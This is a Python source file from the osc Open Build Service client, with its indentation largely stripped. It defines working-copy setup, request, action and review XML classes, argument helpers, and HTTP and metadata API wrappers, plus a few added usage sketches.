if os.path.exists(os.path.join(dir, store)):
raise oscerr.OscIOError(None, 'error: \'%s\' is already an initialized osc working copy' % dir)
else:
os.mkdir(os.path.join(dir, store))
store_write_project(dir, project)
store_write_string(dir, '_package', package + '\n')
store_write_apiurl(dir, apiurl)
if meta:
store_write_string(dir, '_meta_mode', '')
if size_limit:
store_write_string(dir, '_size_limit', str(size_limit) + '\n')
store_write_string(dir, '_files', '<directory />' + '\n')
store_write_string(dir, '_osclib_version', __store_version__ + '\n')
return Package(dir, progress_obj=progress_obj, size_limit=size_limit)
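# Hedged usage sketch (not part of upstream osc): shows how Package.init_package()
# and Package.update() fit together when checking out a single package into a
# fresh directory. The apiurl/project/package/targetdir values are placeholders.
def _example_checkout_package(apiurl='https://api.opensuse.org',
                              project='openSUSE:Factory', package='osc',
                              targetdir='osc'):
    # initialize an empty working copy and pull the latest revision into it
    pac = Package.init_package(apiurl, project, package, targetdir)
    pac.update(rev=pac.latest_rev())
    return pac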
class AbstractState:
"""
Base class which represents state-like objects (<review />, <state />).
"""
def __init__(self, tag):
self.__tag = tag
def get_node_attrs(self):
"""return attributes for the tag/element"""
raise NotImplementedError()
def get_node_name(self):
"""return tag/element name"""
return self.__tag
def get_comment(self):
"""return data from <comment /> tag"""
raise NotImplementedError()
def get_description(self):
"""return data from <description /> tag"""
raise NotImplementedError()
def to_xml(self):
"""serialize object to XML"""
root = ET.Element(self.get_node_name())
for attr in self.get_node_attrs():
val = getattr(self, attr)
if not val is None:
root.set(attr, val)
if self.get_description():
ET.SubElement(root, 'description').text = self.get_description()
if self.get_comment():
ET.SubElement(root, 'comment').text = self.get_comment()
return root
def to_str(self):
"""return "pretty" XML data"""
root = self.to_xml()
xmlindent(root)
return ET.tostring(root, encoding=ET_ENCODING)
class ReviewState(AbstractState):
"""Represents the review state in a request"""
def __init__(self, review_node):
if not review_node.get('state'):
raise oscerr.APIError('invalid review node (state attr expected): %s' % \
ET.tostring(review_node, encoding=ET_ENCODING))
AbstractState.__init__(self, review_node.tag)
self.state = review_node.get('state')
self.by_user = review_node.get('by_user')
self.by_group = review_node.get('by_group')
self.by_project = review_node.get('by_project')
self.by_package = review_node.get('by_package')
self.who = review_node.get('who')
self.when = review_node.get('when')
self.comment = ''
if not review_node.find('comment') is None and \
review_node.find('comment').text:
self.comment = review_node.find('comment').text.strip()
def get_node_attrs(self):
return ('state', 'by_user', 'by_group', 'by_project', 'by_package', 'who', 'when')
def get_comment(self):
return self.comment
def get_description(self):
return None
class RequestHistory(AbstractState):
"""Represents a history element of a request"""
re_name = re.compile(r'^Request (?:got )?([^\s]+)$')
def __init__(self, history_node):
AbstractState.__init__(self, history_node.tag)
self.who = history_node.get('who')
self.when = history_node.get('when')
if not history_node.find('description') is None and \
history_node.find('description').text:
# OBS 2.6
self.description = history_node.find('description').text.strip()
else:
# OBS 2.5 and before
self.description = history_node.get('name')
self.comment = ''
if not history_node.find('comment') is None and \
history_node.find('comment').text:
self.comment = history_node.find('comment').text.strip()
self.name = self._parse_name(history_node)
def _parse_name(self, history_node):
name = history_node.get('name', None)
if name is not None:
# OBS 2.5 and before
return name
mo = self.re_name.search(self.description)
if mo is not None:
return mo.group(1)
return self.description
def get_node_attrs(self):
return ('who', 'when')
def get_description(self):
return self.description
def get_comment(self):
return self.comment
class RequestState(AbstractState):
"""Represents the state of a request"""
def __init__(self, state_node):
if not state_node.get('name'):
raise oscerr.APIError('invalid request state node (name attr expected): %s' % \
ET.tostring(state_node, encoding=ET_ENCODING))
AbstractState.__init__(self, state_node.tag)
self.name = state_node.get('name')
self.who = state_node.get('who')
self.when = state_node.get('when')
if state_node.find('description') is None:
            # OBS 2.6 always has it; before that it did not exist
self.description = state_node.get('description')
self.comment = ''
if not state_node.find('comment') is None and \
state_node.find('comment').text:
self.comment = state_node.find('comment').text.strip()
def get_node_attrs(self):
return ('name', 'who', 'when')
def get_comment(self):
return self.comment
def get_description(self):
return None
class Action:
"""
Represents a <action /> element of a Request.
    This class is generic so that it can be used for all the different
action types. Note: instances only provide attributes for their specific
type.
Examples:
r = Action('set_bugowner', tgt_project='foo', person_name='buguser')
# available attributes: r.type (== 'set_bugowner'), r.tgt_project (== 'foo'), r.tgt_package (== None)
r.to_str() ->
<action type="set_bugowner">
<target project="foo" />
<person name="buguser" />
</action>
##
r = Action('delete', tgt_project='foo', tgt_package='bar')
# available attributes: r.type (== 'delete'), r.tgt_project (== 'foo'), r.tgt_package (=='bar')
r.to_str() ->
<action type="delete">
<target package="bar" project="foo" />
</action>
"""
# allowed types + the corresponding (allowed) attributes
type_args = {'submit': ('src_project', 'src_package', 'src_rev', 'tgt_project', 'tgt_package', 'opt_sourceupdate',
'acceptinfo_rev', 'acceptinfo_srcmd5', 'acceptinfo_xsrcmd5', 'acceptinfo_osrcmd5',
'acceptinfo_oxsrcmd5', 'opt_updatelink', 'opt_makeoriginolder'),
'add_role': ('tgt_project', 'tgt_package', 'person_name', 'person_role', 'group_name', 'group_role'),
'set_bugowner': ('tgt_project', 'tgt_package', 'person_name', 'group_name'),
'maintenance_release': ('src_project', 'src_package', 'src_rev', 'tgt_project', 'tgt_package', 'person_name',
'acceptinfo_rev', 'acceptinfo_srcmd5', 'acceptinfo_xsrcmd5', 'acceptinfo_osrcmd5',
'acceptinfo_oxsrcmd5', 'acceptinfo_oproject', 'acceptinfo_opackage'),
'maintenance_incident': ('src_project', 'src_package', 'src_rev', 'tgt_project', 'tgt_package', 'tgt_releaseproject', 'person_name', 'opt_sourceupdate', 'opt_makeoriginolder',
'acceptinfo_rev', 'acceptinfo_srcmd5', 'acceptinfo_xsrcmd5', 'acceptinfo_osrcmd5',
'acceptinfo_oxsrcmd5'),
'delete': ('tgt_project', 'tgt_package', 'tgt_repository'),
'change_devel': ('src_project', 'src_package', 'tgt_project', 'tgt_package'),
'group': ('grouped_id', )}
# attribute prefix to element name map (only needed for abbreviated attributes)
prefix_to_elm = {'src': 'source', 'tgt': 'target', 'opt': 'options'}
def __init__(self, type, **kwargs):
if not type in Action.type_args.keys():
raise oscerr.WrongArgs('invalid action type: \'%s\'' % type)
self.type = type
for i in kwargs.keys():
if not i in Action.type_args[type]:
raise oscerr.WrongArgs('invalid argument: \'%s\'' % i)
# set all type specific attributes
for i in Action.type_args[type]:
setattr(self, i, kwargs.get(i))
def to_xml(self):
"""
Serialize object to XML.
The xml tag names and attributes are constructed from the instance's attributes.
Example:
self.group_name -> tag name is "group", attribute name is "name"
self.src_project -> tag name is "source" (translated via prefix_to_elm dict),
attribute name is "project"
Attributes prefixed with "opt_" need a special handling, the resulting xml should
look like this: opt_updatelink -> <options><updatelink>value</updatelink></options>.
Attributes which are "None" will be skipped.
"""
root = ET.Element('action', type=self.type)
for i in Action.type_args[self.type]:
prefix, attr = i.split('_', 1)
vals = getattr(self, i)
# single, plain elements are _not_ stored in a list
plain = False
if vals is None:
continue
elif not hasattr(vals, 'append'):
vals = [vals]
plain = True
for val in vals:
elm = root.find(Action.prefix_to_elm.get(prefix, prefix))
if elm is None or not plain:
elm = ET.Element(Action.prefix_to_elm.get(prefix, prefix))
root.append(elm)
if prefix == 'opt':
ET.SubElement(elm, attr).text = val
else:
elm.set(attr, val)
return root
def to_str(self):
"""return "pretty" XML data"""
root = self.to_xml()
xmlindent(root)
return ET.tostring(root, encoding=ET_ENCODING)
@staticmethod
def from_xml(action_node):
"""create action from XML"""
if action_node is None or \
not action_node.get('type') in Action.type_args.keys() or \
not action_node.tag in ('action', 'submit'):
raise oscerr.WrongArgs('invalid argument')
elm_to_prefix = dict([(i[1], i[0]) for i in Action.prefix_to_elm.items()])
kwargs = {}
for node in action_node:
prefix = elm_to_prefix.get(node.tag, node.tag)
if prefix == 'opt':
data = [('opt_%s' % opt.tag, opt.text.strip()) for opt in node if opt.text]
else:
data = [('%s_%s' % (prefix, k), v) for k, v in node.items()]
# it would be easier to store everything in a list but in
# this case we would lose some "structure" (see to_xml)
for k, v in data:
if k in kwargs:
l = kwargs[k]
if not hasattr(l, 'append'):
l = [l]
kwargs[k] = l
l.append(v)
else:
kwargs[k] = v
return Action(action_node.get('type'), **kwargs)
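# Hedged usage sketch (not part of upstream osc): demonstrates the Action XML
# round-trip via to_xml()/from_xml(); all project and package names below are
# placeholders.
def _example_action_roundtrip():
    act = Action('submit', src_project='home:user:branches:foo', src_package='foo',
                 tgt_project='foo:devel', tgt_package='foo', opt_sourceupdate='cleanup')
    # the opt_* attribute ends up as <options><sourceupdate>cleanup</sourceupdate></options>
    xml = act.to_xml()
    clone = Action.from_xml(xml)
    # the reconstructed action should serialize to the same structure
    return clone.to_str()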
class Request:
"""Represents a request (<request />)"""
def __init__(self):
self._init_attributes()
def _init_attributes(self):
"""initialize attributes with default values"""
self.reqid = None
self.creator = ''
self.title = ''
self.description = ''
self.priority = None
self.state = None
self.accept_at = None
self.actions = []
self.statehistory = []
self.reviews = []
def read(self, root):
"""read in a request"""
self._init_attributes()
if not root.get('id'):
raise oscerr.APIError('invalid request: %s\n' % ET.tostring(root, encoding=ET_ENCODING))
self.reqid = root.get('id')
if root.get('creator'):
            # OBS 2.8 and later delivers creator information
self.creator = root.get('creator')
if root.find('state') is None:
raise oscerr.APIError('invalid request (state expected): %s\n' % ET.tostring(root, encoding=ET_ENCODING))
self.state = RequestState(root.find('state'))
action_nodes = root.findall('action')
if not action_nodes:
# check for old-style requests
for i in root.findall('submit'):
i.set('type', 'submit')
action_nodes.append(i)
for action in action_nodes:
self.actions.append(Action.from_xml(action))
for review in root.findall('review'):
self.reviews.append(ReviewState(review))
for history_element in root.findall('history'):
self.statehistory.append(RequestHistory(history_element))
if not root.find('priority') is None and root.find('priority').text:
self.priority = root.find('priority').text.strip()
if not root.find('accept_at') is None and root.find('accept_at').text:
self.accept_at = root.find('accept_at').text.strip()
if not root.find('title') is None:
self.title = root.find('title').text.strip()
if not root.find('description') is None and root.find('description').text:
self.description = root.find('description').text.strip()
def add_action(self, type, **kwargs):
"""add a new action to the request"""
self.actions.append(Action(type, **kwargs))
def get_actions(self, *types):
"""
get all actions with a specific type
(if types is empty return all actions)
"""
if not types:
return self.actions
return [i for i in self.actions if i.type in types]
def get_creator(self):
"""Return the creator of the request.
        This method is deprecated (use the "creator" attribute instead).
"""
return self.creator
def to_xml(self):
"""serialize object to XML"""
root = ET.Element('request')
if self.reqid is not None:
root.set('id', self.reqid)
if self.creator:
root.set('creator', self.creator)
for action in self.actions:
root.append(action.to_xml())
if not self.state is None:
root.append(self.state.to_xml())
for review in self.reviews:
root.append(review.to_xml())
for hist in self.statehistory:
root.append(hist.to_xml())
if self.title:
ET.SubElement(root, 'title').text = self.title
if self.description:
ET.SubElement(root, 'description').text = self.description
if self.accept_at:
ET.SubElement(root, 'accept_at').text = self.accept_at
if self.priority:
ET.SubElement(root, 'priority').text = self.priority
return root
def to_str(self):
"""return "pretty" XML data"""
root = self.to_xml()
xmlindent(root)
return ET.tostring(root, encoding=ET_ENCODING)
def accept_at_in_hours(self, hours):
"""set auto accept_at time"""
import datetime
now = datetime.datetime.utcnow()
now = now + datetime.timedelta(hours=hours)
self.accept_at = now.isoformat()
@staticmethod
def format_review(review, show_srcupdate=False):
"""
        Format a review depending on the reviewer's type.
        Returns a dict which contains the formatted strings.
"""
d = {'state': '%s:' % review.state}
if review.by_package:
d['by'] = '%s/%s' % (review.by_project, review.by_package)
d['type'] = 'Package'
elif review.by_project:
d['by'] = '%s' % review.by_project
d['type'] = 'Project'
elif review.by_group:
d['by'] = '%s' % review.by_group
d['type'] = 'Group'
else:
d['by'] = '%s' % review.by_user
d['type'] = 'User'
if review.who:
d['by'] += '(%s)' % review.who
return d
def format_action(self, action, show_srcupdate=False):
"""
        Format an action depending on the action's type.
        Returns a dict which contains the formatted strings.
"""
def prj_pkg_join(prj, pkg, repository=None):
if not pkg:
if not repository:
return prj or ''
return '%s(%s)' % (prj, repository)
return '%s/%s' % (prj, pkg)
d = {'type': '%s:' % action.type}
if action.type == 'set_bugowner':
if action.person_name:
d['source'] = action.person_name
if action.group_name:
d['source'] = 'group:%s' % action.group_name
d['target'] = prj_pkg_join(action.tgt_project, action.tgt_package)
elif action.type == 'change_devel':
d['source'] = prj_pkg_join(action.tgt_project, action.tgt_package)
d['target'] = 'developed in %s' % prj_pkg_join(action.src_project, action.src_package)
elif action.type == 'maintenance_incident':
d['source'] = '%s ->' % action.src_project
if action.src_package:
d['source'] = '%s' % prj_pkg_join(action.src_project, action.src_package)
if action.src_rev:
d['source'] = d['source'] + '@%s' % action.src_rev
d['source'] = d['source'] + ' ->'
d['target'] = action.tgt_project
if action.tgt_releaseproject:
d['target'] += " (release in " + action.tgt_releaseproject + ")"
srcupdate = ' '
if action.opt_sourceupdate and show_srcupdate:
srcupdate = '(%s)' % action.opt_sourceupdate
elif action.type == 'maintenance_release':
d['source'] = '%s' % prj_pkg_join(action.src_project, action.src_package)
if action.src_rev:
d['source'] = d['source'] + '@%s' % action.src_rev
d['source'] = d['source'] + ' ->'
d['target'] = prj_pkg_join(action.tgt_project, action.tgt_package)
elif action.type == 'submit':
d['source'] = '%s' % prj_pkg_join(action.src_project, action.src_package)
if action.src_rev:
d['source'] = d['source'] + '@%s' % action.src_rev
if action.opt_sourceupdate and show_srcupdate:
d['source'] = d['source'] + '(%s)' % action.opt_sourceupdate
d['source'] = d['source'] + ' ->'
tgt_package = action.tgt_package
if action.src_package == action.tgt_package:
tgt_package = ''
d['target'] = prj_pkg_join(action.tgt_project, tgt_package)
if action.opt_makeoriginolder:
d['target'] = d['target'] + ' ***make origin older***'
if action.opt_updatelink:
d['target'] = d['target'] + ' ***update link***'
elif action.type == 'add_role':
roles = []
if action.person_name and action.person_role:
roles.append('person: %s as %s' % (action.person_name, action.person_role))
if action.group_name and action.group_role:
roles.append('group: %s as %s' % (action.group_name, action.group_role))
d['source'] = ', '.join(roles)
d['target'] = prj_pkg_join(action.tgt_project, action.tgt_package)
elif action.type == 'delete':
d['source'] = ''
d['target'] = prj_pkg_join(action.tgt_project, action.tgt_package, action.tgt_repository)
elif action.type == 'group':
l = action.grouped_id
if l is None:
# there may be no requests in a group action
l = ''
if not hasattr(l, 'append'):
l = [l]
d['source'] = ', '.join(l) + ' ->'
d['target'] = self.reqid
else:
raise oscerr.APIError('Unknown action type %s\n' % action.type)
return d
def list_view(self):
"""return "list view" format"""
import textwrap
lines = ['%6s State:%-10s By:%-12s When:%-19s' % (self.reqid, self.state.name, self.state.who, self.state.when)]
tmpl = ' %(type)-16s %(source)-50s %(target)s'
for action in self.actions:
lines.append(tmpl % self.format_action(action))
tmpl = ' Review by %(type)-10s is %(state)-10s %(by)-50s'
for review in self.reviews:
lines.append(tmpl % Request.format_review(review))
history = ['%s: %s' % (hist.description, hist.who) for hist in self.statehistory]
if history:
lines.append(' From: %s' % ' -> '.join(history))
if self.description:
lines.append(textwrap.fill(self.description, width=80, initial_indent=' Descr: ',
subsequent_indent=' '))
lines.append(textwrap.fill(self.state.comment, width=80, initial_indent=' Comment: ',
subsequent_indent=' '))
return '\n'.join(lines)
def __str__(self):
"""return "detailed" format"""
lines = ['Request: #%s\n' % self.reqid]
if self.accept_at and self.state.name in [ 'new', 'review' ]:
lines.append(' *** This request will get automatically accepted after '+self.accept_at+' ! ***\n')
if self.priority in [ 'critical', 'important' ] and self.state.name in [ 'new', 'review' ]:
            lines.append(' *** This request has been classified as '+self.priority+' ! ***\n')
for action in self.actions:
tmpl = ' %(type)-13s %(source)s %(target)s'
if action.type == 'delete':
# remove 1 whitespace because source is empty
tmpl = ' %(type)-12s %(source)s %(target)s'
lines.append(tmpl % self.format_action(action, show_srcupdate=True))
lines.append('\n\nMessage:')
if self.description:
lines.append(self.description)
else:
lines.append('<no message>')
if self.state:
lines.append('\nState: %-10s %-12s %s' % (self.state.name, self.state.when, self.state.who))
lines.append('Comment: %s' % (self.state.comment or '<no comment>'))
indent = '\n '
tmpl = '%(state)-10s %(by)-50s %(when)-12s %(who)-20s %(comment)s'
reviews = []
for review in reversed(self.reviews):
d = {'state': review.state}
if review.by_user:
d['by'] = "User: " + review.by_user
if review.by_group:
d['by'] = "Group: " + review.by_group
if review.by_package:
d['by'] = "Package: " + review.by_project + "/" + review.by_package
elif review.by_project:
d['by'] = "Project: " + review.by_project
d['when'] = review.when or ''
d['who'] = review.who or ''
d['comment'] = ''
if review.comment:
d['comment'] = '\n ' + review.comment
reviews.append(tmpl % d)
if reviews:
lines.append('\nReview: %s' % indent.join(reviews))
tmpl = '%(when)-10s %(who)-12s %(desc)s'
histories = []
for hist in reversed(self.statehistory):
d = {'when': hist.when, 'who': hist.who, 'desc': hist.description}
histories.append(tmpl % d)
if histories:
lines.append('\nHistory: %s' % indent.join(histories))
return '\n'.join(lines)
def __cmp__(self, other):
return cmp(int(self.reqid), int(other.reqid))
def create(self, apiurl, addrevision=False):
"""create a new request"""
query = {'cmd' : 'create' }
if addrevision:
query['addrevision'] = "1"
u = makeurl(apiurl, ['request'], query=query)
f = http_POST(u, data=self.to_str())
root = ET.fromstring(f.read())
self.read(root)
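# Hedged usage sketch (not part of upstream osc): builds a request object locally
# and serializes it; Request.create(apiurl) would then POST it to the API. All
# names below are placeholders.
def _example_build_submit_request():
    req = Request()
    req.description = 'update to version 1.2.3'
    req.add_action('submit', src_project='home:user:branches:foo', src_package='foo',
                   tgt_project='foo:devel', tgt_package='foo')
    # req.create(apiurl) would send this XML to the build service
    return req.to_str()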
def shorttime(t):
"""format time as Apr 02 18:19
or Apr 02 2005
depending on whether it is in the current year
"""
import time
if time.gmtime()[0] == time.gmtime(t)[0]:
# same year
return time.strftime('%b %d %H:%M', time.gmtime(t))
else:
return time.strftime('%b %d %Y', time.gmtime(t))
def is_project_dir(d):
global store
return os.path.exists(os.path.join(d, store, '_project')) and not \
os.path.exists(os.path.join(d, store, '_package'))
def is_package_dir(d):
global store
return os.path.exists(os.path.join(d, store, '_project')) and \
os.path.exists(os.path.join(d, store, '_package'))
def parse_disturl(disturl):
"""Parse a disturl, returns tuple (apiurl, project, source, repository,
revision), else raises an oscerr.WrongArgs exception
"""
global DISTURL_RE
m = DISTURL_RE.match(disturl)
if not m:
raise oscerr.WrongArgs("`%s' does not look like disturl" % disturl)
apiurl = m.group('apiurl')
if apiurl.split('.')[0] != 'api':
apiurl = 'https://api.' + ".".join(apiurl.split('.')[1:])
return (apiurl, m.group('project'), m.group('source'), m.group('repository'), m.group('revision'))
def parse_buildlogurl(buildlogurl):
"""Parse a build log url, returns a tuple (apiurl, project, package,
repository, arch), else raises oscerr.WrongArgs exception"""
global BUILDLOGURL_RE
m = BUILDLOGURL_RE.match(buildlogurl)
if not m:
raise oscerr.WrongArgs('\'%s\' does not look like url with a build log' % buildlogurl)
return (m.group('apiurl'), m.group('project'), m.group('package'), m.group('repository'), m.group('arch'))
def slash_split(l):
"""Split command line arguments like 'foo/bar' into 'foo' 'bar'.
    This is handy because it allows copy/pasting a project/package combination in this form.
Trailing slashes are removed before the split, because the split would
otherwise give an additional empty string.
"""
r = []
for i in l:
i = i.rstrip('/')
r += i.split('/')
return r
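# Hedged illustration (not part of upstream osc); the names are placeholders:
#   slash_split(['openSUSE:Factory/osc', 'bar/']) == ['openSUSE:Factory', 'osc', 'bar']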
def expand_proj_pack(args, idx=0, howmany=0):
"""looks for occurance of '.' at the position idx.
If howmany is 2, both proj and pack are expanded together
using the current directory, or none of them if not possible.
If howmany is 0, proj is expanded if possible, then, if there
is no idx+1 element in args (or args[idx+1] == '.'), pack is also
expanded, if possible.
If howmany is 1, only proj is expanded if possible.
If args[idx] does not exist, an implicit '.' is assumed.
If not enough elements up to idx exist, an error is raised.
See also parseargs(args), slash_split(args), findpacs(args)
All these need unification, somehow.
"""
# print args,idx,howmany
if len(args) < idx:
        raise oscerr.WrongArgs('not enough arguments, expected at least %d' % idx)
if len(args) == idx:
args += '.'
if args[idx+0] == '.':
if howmany == 0 and len(args) > idx+1:
if args[idx+1] == '.':
# we have two dots.
# remove one dot and make sure to expand both proj and pack
args.pop(idx+1)
howmany = 2
else:
howmany = 1
# print args,idx,howmany
args[idx+0] = store_read_project('.')
if howmany == 0:
try:
package = store_read_package('.')
args.insert(idx+1, package)
except:
pass
elif howmany == 2:
package = store_read_package('.')
args.insert(idx+1, package)
return args
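# Hedged illustration (not part of upstream osc): inside a package working copy
# for project "foo:devel" / package "bar",
#   expand_proj_pack(['.']) expands to ['foo:devel', 'bar'] and
#   expand_proj_pack(['.', 'baz']) expands to ['foo:devel', 'baz'];
# the project/package names are made up.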
def findpacs(files, progress_obj=None, fatal=True):
"""collect Package objects belonging to the given files
and make sure each Package is returned only once"""
pacs = []
no_pacs = []
for f in files:
try:
p = filedir_to_pac(f, progress_obj)
except oscerr.OscBaseError as e:
if fatal:
raise e
no_pacs.append(f)
continue
known = None
for i in pacs:
if i.name == p.name and i.prjname == p.prjname:
known = i
break
if known:
            known.merge(p)
else:
pacs.append(p)
if not fatal:
return pacs, no_pacs
return pacs
def filedir_to_pac(f, progress_obj=None):
"""Takes a working copy path, or a path to a file inside a working copy,
    and returns a Package object instance.
    If the argument was a filename, it is added to the "todo" list of the Package."""
if os.path.isdir(f):
wd = f
p = Package(wd, progress_obj=progress_obj)
else:
wd = os.path.dirname(f) or os.curdir
p = Package(wd, progress_obj=progress_obj)
p.todo = [ os.path.basename(f) ]
return p
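# Hedged usage sketch (not part of upstream osc): collects Package objects for a
# mixed list of files/directories without aborting on unversioned paths; the
# argument and output format are illustrative only.
def _example_collect_packages(paths):
    pacs, no_pacs = findpacs(paths, fatal=False)
    for p in pacs:
        print('%s/%s: %s' % (p.prjname, p.name, ', '.join(p.todo) or '<all files>'))
    return pacs, no_pacs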
def read_filemeta(dir):
global store
msg = '\'%s\' is not a valid working copy.' % dir
filesmeta = os.path.join(dir, store, '_files')
if not is_package_dir(dir):
raise oscerr.NoWorkingCopy(msg)
if not os.path.isfile(filesmeta):
raise oscerr.NoWorkingCopy('%s (%s does not exist)' % (msg, filesmeta))
try:
r = ET.parse(filesmeta)
except SyntaxError as e:
raise oscerr.NoWorkingCopy('%s\nWhen parsing .osc/_files, the following error was encountered:\n%s' % (msg, e))
return r
def store_readlist(dir, name):
global store
r = []
if os.path.exists(os.path.join(dir, store, name)):
r = [line.rstrip('\n') for line in open(os.path.join(dir, store, name), 'r')]
return r
def read_tobeadded(dir):
return store_readlist(dir, '_to_be_added')
def read_tobedeleted(dir):
return store_readlist(dir, '_to_be_deleted')
def read_sizelimit(dir):
global store
r = None
fname = os.path.join(dir, store, '_size_limit')
if os.path.exists(fname):
r = open(fname).readline().strip()
if r is None or not r.isdigit():
return None
return int(r)
def read_inconflict(dir):
return store_readlist(dir, '_in_conflict')
def parseargs(list_of_args):
"""Convenience method osc's commandline argument parsing.
If called with an empty tuple (or list), return a list containing the current directory.
Otherwise, return a list of the arguments."""
if list_of_args:
return list(list_of_args)
else:
return [os.curdir]
def statfrmt(statusletter, filename):
return '%s %s' % (statusletter, filename)
def pathjoin(a, *p):
"""Join two or more pathname components, inserting '/' as needed. Cut leading ./"""
path = os.path.join(a, *p)
if path.startswith('./'):
path = path[2:]
return path
def makeurl(baseurl, l, query=[]):
"""Given a list of path compoments, construct a complete URL.
Optional parameters for a query string can be given as a list, as a
dictionary, or as an already assembled string.
In case of a dictionary, the parameters will be urlencoded by this
    function. In case of a list they will not be -- this is for backwards compatibility.
"""
if conf.config['verbose'] > 1:
print('makeurl:', baseurl, l, query)
if isinstance(query, type(list())):
query = '&'.join(query)
elif isinstance(query, type(dict())):
query = urlencode(query)
scheme, netloc, path = urlsplit(baseurl)[0:3]
return urlunsplit((scheme, netloc, '/'.join([path] + list(l)), query, ''))
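# Hedged illustration (not part of upstream osc): with a dict the query part is
# urlencoded, with a list it is joined verbatim; the apiurl and project names
# below are placeholders.
#   makeurl('https://api.example.org', ['source', 'foo:devel', 'bar'], {'deleted': 1})
#     -> 'https://api.example.org/source/foo:devel/bar?deleted=1'
#   makeurl('https://api.example.org', ['build', 'foo:devel'], ['view=status'])
#     -> 'https://api.example.org/build/foo:devel?view=status'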
def http_request(method, url, headers={}, data=None, file=None):
"""wrapper around urllib2.urlopen for error handling,
and to support additional (PUT, DELETE) methods"""
def create_memoryview(obj):
if sys.version_info < (2, 7, 99):
# obj might be a mmap and python 2.7's mmap does not
# behave like a bytearray (a bytearray in turn can be used
# to create the memoryview). For now simply return a buffer
return buffer(obj)
return memoryview(obj)
filefd = None
if conf.config['http_debug']:
print('\n\n--', method, url, file=sys.stderr)
if method == 'POST' and not file and not data:
# adding data to an urllib2 request transforms it into a POST
data = ''
req = URLRequest(url)
api_host_options = {}
apiurl = conf.extract_known_apiurl(url)
if apiurl is not None:
# ok no external request
install_opener(conf._build_opener(apiurl))
api_host_options = conf.get_apiurl_api_host_options(apiurl)
for header, value in api_host_options['http_headers']:
req.add_header(header, value)
req.get_method = lambda: method
    # POST requests are application/x-www-form-urlencoded by default
# but sending data requires an octet-stream type
if method == 'PUT' or (method == 'POST' and (data or file)):
req.add_header('Content-Type', 'application/octet-stream')
if isinstance(headers, type({})):
for i in headers.keys():
print(headers[i])
req.add_header(i, headers[i])
if file and not data:
size = os.path.getsize(file)
if size < 1024*512:
data = open(file, 'rb').read()
else:
import mmap
filefd = open(file, 'rb')
try:
if sys.platform[:3] != 'win':
data = mmap.mmap(filefd.fileno(), os.path.getsize(file), mmap.MAP_SHARED, mmap.PROT_READ)
else:
data = mmap.mmap(filefd.fileno(), os.path.getsize(file))
data = create_memoryview(data)
except EnvironmentError as e:
if e.errno == 19:
sys.exit('\n\n%s\nThe file \'%s\' could not be memory mapped. It is ' \
'\non a filesystem which does not support this.' % (e, file))
elif hasattr(e, 'winerror') and e.winerror == 5:
# falling back to the default io
data = open(file, 'rb').read()
else:
raise
if conf.config['debug']: print(method, url, file=sys.stderr)
try:
if isinstance(data, str):
data = bytes(data, "utf-8")
fd = urlopen(req, data=data)
finally:
if hasattr(conf.cookiejar, 'save'):
conf.cookiejar.save(ignore_discard=True)
if filefd: filefd.close()
return fd
def http_GET(*args, **kwargs): return http_request('GET', *args, **kwargs)
def http_POST(*args, **kwargs): return http_request('POST', *args, **kwargs)
def http_PUT(*args, **kwargs): return http_request('PUT', *args, **kwargs)
def http_DELETE(*args, **kwargs): return http_request('DELETE', *args, **kwargs)
def check_store_version(dir):
global store
versionfile = os.path.join(dir, store, '_osclib_version')
try:
v = open(versionfile).read().strip()
except:
v = ''
if v == '':
msg = 'Error: "%s" is not an osc package working copy.' % os.path.abspath(dir)
if os.path.exists(os.path.join(dir, '.svn')):
msg = msg + '\nTry svn instead of osc.'
raise oscerr.NoWorkingCopy(msg)
if v != __store_version__:
if v in ['0.2', '0.3', '0.4', '0.5', '0.6', '0.7', '0.8', '0.9', '0.95', '0.96', '0.97', '0.98', '0.99']:
# version is fine, no migration needed
f = open(versionfile, 'w')
f.write(__store_version__ + '\n')
f.close()
return
msg = 'The osc metadata of your working copy "%s"' % dir
msg += '\nhas __store_version__ = %s, but it should be %s' % (v, __store_version__)
msg += '\nPlease do a fresh checkout or update your client. Sorry about the inconvenience.'
raise oscerr.WorkingCopyWrongVersion(msg)
def meta_get_packagelist(apiurl, prj, deleted=None, expand=False):
query = {}
if deleted:
query['deleted'] = 1
if expand:
query['expand'] = 1
u = makeurl(apiurl, ['source', prj], query)
f = http_GET(u)
root = ET.parse(f).getroot()
return [ node.get('name') for node in root.findall('entry') ]
def meta_get_filelist(apiurl, prj, package, verbose=False, expand=False, revision=None, meta=False, deleted=False):
"""return a list of file names,
    or a list of File() instances if verbose=True"""
query = {}
if deleted:
query['deleted'] = 1
if expand:
query['expand'] = 1
if meta:
query['meta'] = 1
if revision:
query['rev'] = revision
else:
query['rev'] = 'latest'
u = makeurl(apiurl, ['source', prj, package], query=query)
f = http_GET(u)
root = ET.parse(f).getroot()
if not verbose:
return [ node.get('name') for node in root.findall('entry') ]
else:
l = []
# rev = int(root.get('rev')) # don't force int. also allow srcmd5 here.
rev = root.get('rev')
for node in root.findall('entry'):
f = File(node.get('name'),
node.get('md5'),
int(node.get('size')),
int(node.get('mtime')))
f.rev = rev
l.append(f)
return l
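# Hedged usage sketch (not part of upstream osc): with verbose=True, File objects
# (with name/md5/mtime attributes) are returned instead of plain names; the
# arguments and the selection criterion are placeholders.
def _example_newest_files(apiurl, prj, package, count=5):
    files = meta_get_filelist(apiurl, prj, package, verbose=True)
    # sort by modification time, newest first
    return sorted(files, key=lambda f: f.mtime, reverse=True)[:count]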
def meta_get_project_list(apiurl, deleted=None):
query = {}
if deleted:
query['deleted'] = 1
u = makeurl(apiurl, ['source'], query)
f = http_GET(u)
root = ET.parse(f).getroot()
return sorted([ node.get('name') for node in root if node.get('name')])
def show_project_meta(apiurl, prj, rev=None, blame=None):
query = {}
if blame:
query['view'] = "blame"
if rev:
query['rev'] = rev
url = makeurl(apiurl, ['source', prj, '_project', '_meta'], query)
try:
f = http_GET(url)
except HTTPError as e:
error_help = "%d" % e.code
os_err = e.hdrs.get('X-Opensuse-Errorcode')
if os_err:
error_help = "%s (%d) project: %s" % (os_err, e.code, prj)
if e.code == 404 and os_err == 'unknown_package':
error_help = 'option -r|--revision is not supported by this OBS version'
e.osc_msg = 'BuildService API error: %s' % error_help
raise
else:
if blame:
url = makeurl(apiurl, ['source', prj, '_project', '_meta'], query)
else:
url = makeurl(apiurl, ['source', prj, '_meta'])
f = http_GET(url)
return f.readlines()
def show_project_conf(apiurl, prj, rev=None, blame=None):
query = {}
url = None
if rev:
query['rev'] = rev
if blame:
query['view'] = "blame"
url = makeurl(apiurl, ['source', prj, '_project', '_config'], query=query)
else:
url = makeurl(apiurl, ['source', prj, '_config'], query=query)
f = http_GET(url)
return f.readlines()
